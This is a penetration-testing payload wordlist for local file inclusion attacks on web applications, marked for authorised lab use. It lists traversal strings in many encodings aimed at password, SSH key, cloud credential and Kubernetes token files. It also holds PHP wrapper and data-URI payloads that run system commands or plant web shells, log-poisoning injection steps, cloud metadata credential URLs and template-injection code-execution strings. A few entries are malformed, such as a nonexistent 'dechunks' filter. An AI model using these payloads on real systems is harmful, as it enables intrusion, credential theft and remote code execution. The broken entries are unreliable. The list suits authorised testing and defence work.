# payloads/web/lfi.txt
# Local File Inclusion detection payloads — AUTHORISED LAB USE ONLY
# Advanced pentester edition — comprehensive coverage across all vectors
# Includes PHP wrappers, log poisoning, session RCE, filter chain, and 2026-relevant techniques

# ── Unix absolute paths ──────────────────────────────────────
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/resolv.conf
/etc/network/interfaces
/etc/sudoers
/etc/crontab
/etc/fstab
/etc/mtab
/etc/aliases
/etc/shells
/etc/services
/etc/group
/etc/gshadow
/etc/security/access.conf
/etc/security/limits.conf
/etc/pam.d/common-auth
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_ecdsa_key
/etc/ssl/openssl.cnf
/etc/mysql/my.cnf
/etc/mysql/mariadb.cnf
/etc/postgresql/*/main/pg_hba.conf
/etc/postgresql/*/main/postgresql.conf
/etc/php.ini
/etc/php/*/apache2/php.ini
/etc/php/*/cli/php.ini
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/nginx/sites-available/default
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-available/000-default.conf
/etc/apache2/conf-enabled/security.conf
/etc/apache2/.htpasswd
/etc/httpd/conf/httpd.conf
/etc/httpd/conf.d/ssl.conf
/etc/redhat-release
/etc/debian_version
/etc/lsb-release
/etc/os-release
/proc/self/environ
/proc/self/cmdline
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/10
/proc/self/fd/12
/proc/self/fd/15
/proc/self/maps
/proc/self/mem
/proc/self/cwd/index.html
/proc/self/root/etc/passwd
/proc/version
/proc/cmdline
/proc/cpuinfo
/proc/meminfo
/proc/partitions
/proc/diskstats
/proc/mounts
/proc/swaps
/proc/uptime
/proc/stat
/proc/1/environ
/proc/1/cmdline
/proc/1/status
/proc/1/fd/0
/proc/1/fd/1
/proc/1/fd/2
/proc/1/cwd
/proc/1/root/etc/passwd
/proc/net/tcp
/proc/net/arp
/proc/net/route
/proc/net/fib_trie
/proc/net/dev
/proc/net/wireless
/proc/net/if_inet6
/proc/net/ip6_route
/sys/kernel/notes
/.dockerenv
/run/secrets/*
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
/run/secrets/kubernetes.io/serviceaccount/namespace
/var/log/apache2/access.log
/var/log/apache2/access.log.1
/var/log/apache2/error.log
/var/log/apache2/error.log.1
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/nginx/access.log
/var/log/nginx/access.log.1
/var/log/nginx/error.log
/var/log/nginx/error.log.1
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/auth.log
/var/log/auth.log.1
/var/log/system.log
/var/log/messages
/var/log/syslog
/var/log/dmesg
/var/log/kern.log
/var/log/maillog
/var/log/mail.log
/var/log/mysql/error.log
/var/log/mariadb/mariadb.log
/var/log/postgresql/postgresql-*.log
/var/log/cron
/var/log/secure
/var/log/wtmp
/var/log/lastlog
/var/log/faillog
/var/log/dpkg.log
/var/log/apt/history.log
/var/log/apt/term.log
/var/log/boot.log
/var/log/faillog
/var/log/btmp
/var/run/utmp
/var/run/apache2.pid
/var/run/httpd.pid
/var/run/nginx.pid
/var/run/mysqld/mysqld.sock
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/db.MYD
/var/lib/mysql/mysql/db.MYI
/var/lib/mysql/ibdata1
/var/lib/mysql/ib_logfile0
/var/lib/redis/dump.rdb
/var/lib/redis/appendonly.aof
/var/lib/pgsql/data/pg_hba.conf
/var/lib/pgsql/data/postgresql.conf
/var/lib/pgsql/data/pgpass
/var/lib/mongodb/mongod.lock
/var/lib/mongodb/*.ns
/var/lib/mongodb/*.0
/var/lib/mongodb/*.1
/root/.bash_history
/root/.mysql_history
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/root/.ssh/known_hosts
/root/.aws/credentials
/root/.aws/config
/root/.docker/config.json
/root/.kube/config
/root/.gitconfig
/root/.bashrc
/root/.profile
/home/*/.bash_history
/home/*/.ssh/id_rsa
/home/*/.ssh/authorized_keys
/home/*/.aws/credentials
/home/*/.gitconfig
/home/*/.bashrc
/home/*/.profile
/home/*/.npmrc
/home/*/.env

# ── Unix traversal ───────────────────────────────────────────
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../proc/self/environ
../../proc/self/environ
../../../proc/self/environ
../../../../proc/self/environ
../../../../../proc/self/environ
../../../../../../proc/self/environ
../../var/log/apache2/access.log
../../../var/log/apache2/access.log
../../../../var/log/apache2/access.log
../../../../../var/log/apache2/access.log
../var/log/nginx/access.log
../../var/log/nginx/access.log
../../../var/log/nginx/access.log
../../../../var/log/nginx/access.log
../home/*/.ssh/id_rsa
../../home/*/.ssh/id_rsa
../../../home/*/.ssh/id_rsa
../../../../home/*/.ssh/id_rsa
../root/.ssh/id_rsa
../../root/.ssh/id_rsa
../../../root/.ssh/id_rsa
../../../../root/.ssh/id_rsa

# ── URL encoded traversal ────────────────────────────────────
..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2Fproc%2Fself%2Fenviron
..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%5C%2E%2E%5C%2E%2E%5Cwindows%5Cwin.ini
%2E%2E%2Fvar%2Fwww%2Fhtml%2Fconfig.php
%2E%2E%2F%2E%2E%2Fvar%2Fwww%2Fhtml%2F.env
%2E%2E%2F..%2F%2E%2E%2Fproc/self/environ

# ── Double-encoded traversal ─────────────────────────────────
..%252F..%252F..%252Fetc%252Fpasswd
..%252F..%252F..%252F..%252Fetc%252Fpasswd
..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
..%252F..%252F..%252Fvar%252Flog%252Fapache2%252Faccess.log
..%252F..%252F..%252Fproc%252Fself%252Fenviron
%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
%25252F%25252E%25252E%25252F%25252E%25252E%25252Fetc%25252Fpasswd
%25%32%46%25%32%46%25%32%46etc%25%32%46passwd
%25%32%45%25%32%45%25%32%46etc%25%32%46passwd
%%32%46%%32%46%%32%46etc%%32%46passwd
%%32%45%%32%45%%32%46etc%%32%46passwd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd
..%252F..%252F..%252F..%252F..%252Fboot.ini
%252e%252e%255c%252e%252e%255cwindows%255cwin.ini

# ── Triple-encoded traversal ─────────────────────────────────
..%25252F..%25252F..%25252Fetc%25252Fpasswd
..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
%2525252E%2525252E%2525252Fetc%2525252Fpasswd
..%2525%2525%252F..%2525%2525%252F..%2525%2525%252Fetc%2525%2525%252Fpasswd
..%25252F..%25252F..%25252Fvar%25252Flog%25252Fapache2%25252Faccess.log

# ── Null-byte injection (legacy PHP < 5.3) ──────────────────
../../../etc/passwd%00
../../../etc/passwd%00.php
../../../etc/passwd%00.txt
../../../etc/passwd%00.html
../../../etc/passwd%00.ext
../../../etc/passwd%00%00%00
../../../etc/passwd%00.png
../../../etc/passwd%00.jpg
../../../etc/passwd%00.gif
../../../etc/passwd%00.bak
../../../etc/passwd%00.inc
../../../etc/passwd%00.dat
../../../etc/passwd%00.db
../../../etc/passwd%2500
../../../etc/passwd%2500.php
../../../etc/passwd%00%3Fext%3D.php
../../../etc/passwd%2500.html
/config.php%00
/config.php%00.txt
/config.php%2500
../../../etc/passwd%00&ext=.php
../../../etc/passwd%00?ext=.php

# ── Windows paths ────────────────────────────────────────────
c:\\windows\\win.ini
c:\\windows\\system.ini
c:\\boot.ini
c:\\autoexec.bat
c:\\windows\\php.ini
c:\\windows\\my.ini
c:\\Program Files\\*\\*
c:\\Program Files (x86)\\*\\*
c:\\Users\\*\\AppData\\Roaming\\*\\*
c:\\Users\\*\\AppData\\Local\\*\\*
c:\\inetpub\\wwwroot\\web.config
c:\\inetpub\\wwwroot\\global.asa
c:\\inetpub\\logs\\LogFiles\\W3SVC1\\*.log
c:\\inetpub\\wwwroot\\App_Data\\*.mdf
c:\\xampp\\apache\\conf\\httpd.conf
c:\\xampp\\php\\php.ini
c:\\xampp\\mysql\\bin\\my.ini
c:\\wamp\\apache2\\conf\\httpd.conf
c:\\wamp\\php\\php.ini
c:\\wamp\\mysql\\my.ini
C:\Windows\win.ini
C:\Windows\system.ini
C:\boot.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\drivers\etc\networks
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SOFTWARE
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\*
..\..\..\Windows\win.ini
..\..\..\..\Windows\win.ini
..\..\..\..\..\Windows\win.ini
..\..\..\..\..\..\Windows\win.ini
..\..\..\Windows\System32\drivers\etc\hosts
..\..\..\..\Windows\System32\config\SAM
..\..\..\..\boot.ini
..\..\..\..\autoexec.bat
..\..\..\..\Windows\php.ini
..\..\..\..\Windows\my.ini
..\..\..\..\inetpub\wwwroot\web.config
..\..\..\..\inetpub\logs\LogFiles\W3SVC1\u_ex*.log
../../../../windows/win.ini
../../../../windows/system.ini
../../../../../../windows/win.ini
../../../../boot.ini
../../../../windows/System32/drivers/etc/hosts
../../../../windows/System32/config/SAM
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
..%5C..%5C..%5C..%5Cwindows%5Csystem32%5Cconfig%5CSAM

# ── PHP wrappers ─────────────────────────────────────────────
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../index
php://filter/convert.base64-encode/resource=../index.php
php://filter/convert.base64-encode/resource=../config
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../admin/config
php://filter/convert.base64-encode/resource=../admin/config.php
php://filter/convert.base64-encode/resource=../../config
php://filter/convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=../../wp-config
php://filter/convert.base64-encode/resource=../../wp-config.php
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=/etc/shadow
php://filter/convert.base64-encode/resource=/proc/self/environ
php://filter/convert.base64-encode/resource=/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/var/log/nginx/access.log
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=admin/config.php
php://filter/read=convert.base64-encode/resource=../../config.php
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=/etc/shadow
php://filter/read=convert.base64-encode/resource=/proc/self/environ
php://filter/read=string.rot13/resource=config.php
php://filter/read=string.rot13/resource=index.php
php://filter/read=string.toupper/resource=index.php
php://filter/read=string.tolower/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-7/resource=config.php
php://filter/read=convert.iconv.utf-8.utf-16/resource=config.php
php://filter/read=convert.iconv.utf-8.utf-16le/resource=config.php
php://filter/read=convert.iconv.utf-8.utf-16be/resource=config.php
php://filter/read=convert.iconv.utf-8.utf-7/resource=/etc/passwd
php://filter/read=zlib.deflate/resource=config.php
php://filter/read=zlib.inflate/resource=config.php
php://filter/convert.base64-encode|convert.base64-decode/resource=config.php
php://filter/read=consumed/resource=config.php
php://filter/read=convert.base64-encode/resource=php://filter/read=convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=php://filter/convert.base64-encode/resource=config.php
php://filter/%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%65%6e%63%6f%64%65/resource=config.php
php://filter/convert.base64-encode/resource=..//..//config.php
php://filter/convert.base64-encode/resource=admin/./../../config.php

# ── PHP filter chain (RCE via chained filters) ──────────────
php://filter/convert.iconv.utf-8.utf-7|convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode|convert.iconv.utf-8.utf-7/resource=index.php
php://filter/zlib.deflate|convert.base64-encode/resource=config.php
php://filter/convert.base64-encode|zlib.deflate/resource=config.php
php://filter/read=convert.iconv.utf-8.utf-16|convert.base64-encode/resource=index.php
php://filter/convert.iconv.utf-8.utf-7|zlib.deflate|convert.base64-encode/resource=index.php
php://filter/read=consumed|convert.base64-encode/resource=index.php
php://filter/read=consumed|string.rot13/resource=index.php

# ── PHP iconv filter chain RCE (dechunk + iconv) ───────────
php://filter/convert.dechunks|convert.iconv.utf-8.utf-7/resource=data://text/plain,<?=system('id')?>
php://filter/convert.dechunks|convert.base64-encode/resource=data://text/plain,<?=system('id')?>
php://filter/convert.iconv.utf-8.utf-16|convert.base64-encode/resource=/etc/passwd

# ── PHP input wrapper ────────────────────────────────────────
php://input
php://input%00
php://input%00.php
php://input?%00
php://input%0d%0a
php://input HTTP/1.0
php://input%0d%0a%0d%0aPOST data
expect://id
expect://ls
expect://cat /etc/passwd
expect://uname -a
expect://whoami
expect://php -r 'system("id");'

# ── Data wrapper ─────────────────────────────────────────────
data://text/plain,test
data://text/plain,<?php%20system('id');?>
data://text/plain,<?php%20echo%20shell_exec('id');?>
data://text/plain,<?php%20phpinfo();?>
data://text/plain,<?php%20echo%20file_get_contents('/etc/passwd');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==
data://text/plain;base64,PD9waHAgZWNobyAnUkNFOiAnLnNoZWxsX2V4ZWMoJ2lkJyk7ID8+
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
data://text/plain;base64,PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4=
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFsnY21kJ10pOyA/Pg==
data://text/javascript,alert(1)
data:text/plain,test
data:text/plain,<?php system('id');?>
data:text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data:application/x-httpd-php;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data://text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

# ── File wrapper ─────────────────────────────────────────────
file:///etc/passwd
file:///etc/shadow
file:///proc/self/environ
file:///var/log/apache2/access.log
file:///var/www/html/index.php
file://localhost/etc/passwd
file:///C:/Windows/win.ini
file:///C:/boot.ini
file://localhost/C:/Windows/win.ini
file:///C:/inetpub/wwwroot/web.config

# ── Zip / Archive wrappers ──────────────────────────────────
zip://file.zip%23directory/file.txt
zip://../file.zip%23directory/file.txt
zip://../../../etc/passwd.zip%23passwd
zip://test.zip%23config.php
zip://shell.zip%23shell.php
compress.zlib://../../../etc/passwd
compress.bzip2://../../../etc/passwd
compress.zlib://file.phps
compress.bzip2://file.phps
phar://test.phar/test.txt
phar://test.phar/file.txt
phar://test.phar/internal.php
phar://./test.phar/test.txt
phar:///var/www/html/uploads/test.phar/test.txt
phar://../../../var/www/html/uploads/test.phar/test.txt
php://filter/convert.base64-encode/resource=phar://test.phar/test.txt

# ── Phar deserialization ────────────────────────────────────
phar://test.phar/test.txt
phar://./test.phar/internal.php
phar:///var/www/html/uploads/shell.phar/shell.txt
phar://../../../uploads/shell.phar/shell.txt
php://filter/convert.base64-encode/resource=phar://test.phar/test.txt
phar://test.phar/../../../../etc/passwd

# ── Session file inclusion (LFI to RCE) ────────────────────
/var/lib/php/sessions/sess_
/var/lib/php/sessions/sess_*SESSIONID*
/var/lib/php/sess_
/var/lib/php/sess_*SESSIONID*
/tmp/sess_
/tmp/sess_*SESSIONID*
/var/lib/php/session/sess_
/var/lib/php/session/sess_*SESSIONID*
/var/lib/php5/sess_
/var/lib/php5/sess_*SESSIONID*
/var/lib/php7/sessions/sess_
/var/lib/php7/sessions/sess_*SESSIONID*
/var/cpanel/php/sessions/ea-php*/sess_*SESSIONID*
../../../var/lib/php/sessions/sess_*SESSIONID*
../../../../var/lib/php/sessions/sess_*SESSIONID*
../../../tmp/sess_*SESSIONID*
../../../../tmp/sess_*SESSIONID*
/var/lib/php/sessions/sess_test123
../../../var/lib/php/sessions/sess_test123

# ── Log poisoning (Apache access log → RCE) ────────────────
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache2/access.log.1
/var/log/apache2/error.log.1
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/nginx/access.log.1
/var/log/nginx/error.log.1
/var/log/vsftpd.log
/var/log/proftpd/proftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/mail.log
/var/log/mail.err
/var/log/mail.info
/var/log/maillog
/var/log/auth.log
/var/log/secure
/var/log/messages
/var/log/syslog
/var/log/cron
/var/log/sshd.log
/var/log/mysql/error.log
/var/log/mariadb/mariadb.log

# ── Log poisoning via User-Agent injection ──────────────
# Inject: <?php system($_GET['c']); ?>
# Then include: /var/log/apache2/access.log?c=id
# User-Agent: <?php system('id'); ?>
# Include via LFI

# ── SSH log poisoning ────────────────────────────────────────
/var/log/auth.log
/var/log/secure
/var/log/btmp
# Inject: ssh '<?php system("id"); ?>'@target
# Then include: /var/log/auth.log

# ── Mail log poisoning ───────────────────────────────────────
/var/log/mail.log
/var/log/mail.err
/var/log/maillog

# ── Process fd poisoning ────────────────────────────────────
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/1/fd/0
/proc/1/fd/1
/proc/1/fd/2
/proc/1/fd/10
/proc/1/fd/11
/proc/1/fd/12
/proc/1/fd/13
/proc/1/fd/14
/proc/1/fd/15

# ── Temp file inclusion ──────────────────────────────────────
/tmp/test.txt
/tmp/php*
/tmp/sess_*
/tmp/mysql.sock
/tmp/.s*
/tmp/*.pid
/tmp/*.log
../../../tmp/sess_*SESSIONID*
../../../tmp/php*
../../../../tmp/sess_*SESSIONID*

# ── Proc/self/environ poisoning ────────────────────────────
/proc/self/environ
/proc/self/environ%00
/proc/self/environ%00.php
# Inject malicious payload via User-Agent header
# Then include /proc/self/environ

# ── Application-specific files ─────────────────────────────
/config.php
/config.inc.php
/config.inc
/db.php
/db.inc.php
/settings.php
/admin/config.php
/admin/config.inc.php
/admin/settings.php
/inc/config.php
/inc/config.inc.php
/inc/db.php
/includes/config.php
/includes/db.php
/includes/functions.php
/var/www/html/index.php
/var/www/html/config.php
/var/www/html/config.inc.php
/var/www/html/db.php
/var/www/html/settings.php
/var/www/html/wp-config.php
/var/www/html/wp-config.php.bak
/var/www/html/.env
/var/www/html/.git/config
/var/www/html/.htaccess
/var/www/html/.htpasswd
/var/www/html/admin/config.php
/var/www/html/phpinfo.php
/var/www/html/info.php
/var/www/html/dump.sql
/var/www/html/backup.sql
/var/www/html/error.log
/var/www/html/install/
/var/www/html/install.php
/var/www/html/UPGRADE.txt
/var/www/html/CHANGELOG.txt
/var/www/html/README.txt
/var/www/html/LICENSE.txt
/var/www/html/composer.json
/var/www/html/composer.lock
/var/www/html/package.json
/var/www/html/package-lock.json
/var/www/html/yarn.lock
/var/www/html/webpack.config.js
/var/www/html/vite.config.js
/var/www/html/next.config.js
/var/www/html/nuxt.config.js
/var/www/html/Dockerfile
/var/www/html/docker-compose.yml
/var/www/html/docker-compose.yaml

# ── WordPress specific ──────────────────────────────────────
../../../wp-config.php
../../../wp-config.php.bak
../../../wp-content/debug.log
../../../wp-content/plugins/*
../../../wp-content/themes/*
../../../wp-content/uploads/*
../../../wp-admin/admin.php
../../../wp-includes/functions.php
../../../../wp-config.php
../../../../wp-content/debug.log
../wp-config.php
../wp-content/debug.log
wp-config.php
wp-content/debug.log
/var/www/html/wp-config.php
/var/www/html/wp-config-sample.php
/var/www/html/wp-content/debug.log

# ── Laravel specific ────────────────────────────────────────
../.env
../../.env
../../../.env
../../../../.env
../config/app.php
../../config/app.php
../config/database.php
../../config/database.php
../storage/logs/laravel.log
../../storage/logs/laravel.log
../../../storage/logs/laravel.log
.ENV
.env
.env.local
.env.production
.env.development
.env.testing
.env.example
/config/app.php
/config/database.php
/storage/logs/laravel.log
/var/www/html/.env
/var/www/html/storage/logs/laravel.log

# ── Symfony specific ────────────────────────────────────────
../app/config/parameters.yml
../../app/config/parameters.yml
../app/config/parameters.php
../../app/config/parameters.php
../config/parameters.yaml
../../config/parameters.yaml
../var/log/dev.log
../../var/log/dev.log
../var/log/prod.log
../../var/log/prod.log
/app/config/parameters.yml
/app/config/parameters.php
/var/log/dev.log
/var/log/prod.log
/var/www/html/app/config/parameters.yml

# ── Joomla specific ─────────────────────────────────────────
../configuration.php
../../configuration.php
../../../configuration.php
../../../../configuration.php
configuration.php
/var/www/html/configuration.php

# ── Drupal specific ─────────────────────────────────────────
../sites/default/settings.php
../../sites/default/settings.php
../../../sites/default/settings.php
../../../../sites/default/settings.php
sites/default/settings.php
/var/www/html/sites/default/settings.php

# ── Magento specific ────────────────────────────────────────
../app/etc/local.xml
../../app/etc/local.xml
../../../app/etc/local.xml
../../../../app/etc/local.xml
../app/etc/env.php
../../app/etc/env.php
../var/log/system.log
../../var/log/system.log
../var/log/exception.log
../../var/log/exception.log
app/etc/local.xml
app/etc/env.php
/var/www/html/app/etc/local.xml

# ── Java / Spring Boot specific ─────────────────────────────
/WEB-INF/web.xml
/WEB-INF/applicationContext.xml
/WEB-INF/dwr.xml
/WEB-INF/struts-config.xml
/WEB-INF/classes/application.properties
/WEB-INF/classes/hibernate.cfg.xml
/WEB-INF/classes/log4j.properties
/WEB-INF/classes/logback.xml
/WEB-INF/classes/jdbc.properties
/WEB-INF/classes/database.properties
/WEB-INF/classes/db.properties
/WEB-INF/classes/config.properties
/WEB-INF/classes/*.class
/META-INF/MANIFEST.MF
/META-INF/application.xml
/META-INF/context.xml
/META-INF/MANIFEST.MF
../WEB-INF/web.xml
../../WEB-INF/web.xml
../../../WEB-INF/web.xml
../../../../WEB-INF/web.xml
../WEB-INF/classes/application.properties
../../WEB-INF/classes/application.properties
classpath:application.properties
classpath:static/index.html
classpath:templates/index.html
file:/etc/passwd
file:./config/application.properties
file:./target/classes/application.properties
file:./WEB-INF/classes/application.properties
file:///etc/passwd
file:///C:/Windows/win.ini
# Spring Boot actuator
/actuator
/actuator/info
/actuator/health
/actuator/env
/actuator/configprops
/actuator/mappings
/actuator/beans
/actuator/trace
/actuator/dump
/actuator/heapdump
/actuator/logfile
/actuator/loggers
/actuator/metrics
/actuator/prometheus
/actuator/httptrace
/actuator/threaddump

# ── Node.js / Express specific ───────────────────────────────
../package.json
../../package.json
../../../package.json
../.env
../../.env
../../../.env
../server.js
../app.js
../index.js
../../server.js
../../app.js
../../index.js
../node_modules/*
../config.js
../config/default.json
../config/production.json
/package.json
/.env
/.env.local
/.env.production
/server.js
/app.js
/index.js
../next.config.js
../nuxt.config.js
../vue.config.js
../svelte.config.js
./.next/build-manifest.json
./.next/server/pages-manifest.json
./.next/routes-manifest.json
/node_modules/express/package.json
/node_modules/express/index.js

# ── Python / Django specific ────────────────────────────────
../settings.py
../manage.py
../requirements.txt
../.env
../../settings.py
../../manage.py
../../requirements.txt
../../.env
../db.sqlite3
../../db.sqlite3
../config/settings.py
../../config/settings.py
/app/views.py
/app/models.py
/app/admin.py
/app/urls.py
/requirements.txt
/Pipfile
/Pipfile.lock
/venv/*
/.venv/*
/__pycache__/*
/tox.ini
/setup.py
/setup.cfg

# ── Ruby on Rails specific ──────────────────────────────────
../config/routes.rb
../config/database.yml
../config/application.rb
../config/secrets.yml
../config/master.key
../config/credentials.yml.enc
../Gemfile
../Gemfile.lock
../db/schema.rb
/app/controllers/application_controller.rb
/app/models/application_record.rb
/app/views/layouts/application.html.erb
/config/routes.rb
/config/database.yml
/config/application.rb
/config/secrets.yml
/config/master.key
/config/credentials.yml.enc
/db/schema.rb

# ── ASP.NET specific ────────────────────────────────────────
../web.config
../../web.config
../Web.config
../App_Code/*
../App_Data/*
../App_Data/*.mdf
../bin/*
../bin/*.dll
../Global.asax
../Global.asax.cs
/web.config
/Global.asax
/Global.asax.cs
/bin/*.dll
/App_Data/*.mdf
/Web.config

# ── Docker / Container specific ─────────────────────────────
/.dockerenv
/run/secrets/*
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
/run/secrets/kubernetes.io/serviceaccount/namespace
/proc/1/cgroup
/proc/1/mountinfo
/proc/1/cwd
/kubelet.config
/etc/kubernetes/admin.conf
/etc/kubernetes/kubelet.conf
/var/lib/kubelet/kubeconfig
/var/lib/docker/containers/*/config.v2.json
/var/lib/docker/containers/*/hostname
/var/lib/docker/containers/*/hosts
/var/lib/docker/containers/*/resolv.conf
/var/lib/docker/overlay2/*/diff/root/.ssh/authorized_keys
/root/.docker/config.json
/home/*/.docker/config.json

# ── Cloud metadata endpoints (SSRF via LFI) ────────────────
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/local-ipv4
http://169.254.169.254/latest/meta-data/public-ipv4
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/placement/availability-zone
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1/instance/attributes/ssh-keys
http://metadata.google.internal/computeMetadata/v1/project/project-id
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com
http://169.254.169.254/metadata/instance/compute?api-version=2021-02-01&format=json

# ── Server-side template injection via LFI ─────────────────
{{7*7}}
{{7*'7'}}
{{config}}
{{self.__class__.__mro__[2].__subclasses__()}}
#{7*7}
{{7*7}}
${7*7}
<%= 7*7 %>
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{settings.SECRET_KEY}}
{{app.config.SECRET_KEY}}

# ── Source code disclosure ──────────────────────────────────
../index.php
../index.php.bak
../index.php~
../index.php.old
../index.php.orig
../index.php.swp
../index.php.swo
../index.php.swn
../index.php.save
../index.php.save
./index.php.bak
.index.php.swp
index.php~
index.php.bak
index.php.old
index.php.orig
index.php.save
index.php.swp
index.php~.php
.DS_Store
Thumbs.db
__init__.py
.htpasswd
.htaccess
.git/HEAD
.git/config
.git/index
.git/logs/HEAD
.svn/entries
.svn/wc.db
CVS/Root

# ── Compressed / backup files ───────────────────────────────
backup.tar.gz
backup.zip
backup.rar
backup.7z
backup.sql
backup.tar
backup.gz
site.tar.gz
site.zip
dump.sql
data.sql
db.sql
db_backup.sql
backup.db
backup.sqlite
database.sql
database.sqlite
mysql_backup.sql
dump.rdb
www-backup.tar.gz
www.zip
site-backup.tar.gz
../../../../backup.sql
../../../backup.tar.gz
../../../backup.zip
../../../../backup.zip
../../../../../backup.tar.gz
/var/backups/*
/var/backups/*.tar.gz
/var/backups/*.sql
/var/backups/*.zip
/var/backups/*.tgz

# ── LFI via include() function patterns ────────────────────
page=../../../etc/passwd
file=../../../etc/passwd
path=../../../etc/passwd
dir=../../../etc/passwd
template=../../../etc/passwd
view=../../../etc/passwd
load=../../../etc/passwd
import=../../../etc/passwd
module=../../../etc/passwd
include=../../../etc/passwd
require=../../../etc/passwd
document=../../../etc/passwd
url=../../../etc/passwd
folder=../../../etc/passwd
root=../../../etc/passwd
inc=../../../etc/passwd
locate=../../../etc/passwd
show=../../../etc/passwd
read=../../../etc/passwd
filepath=../../../etc/passwd
filename=../../../etc/passwd
file_name=../../../etc/passwd
file_path=../../../etc/passwd
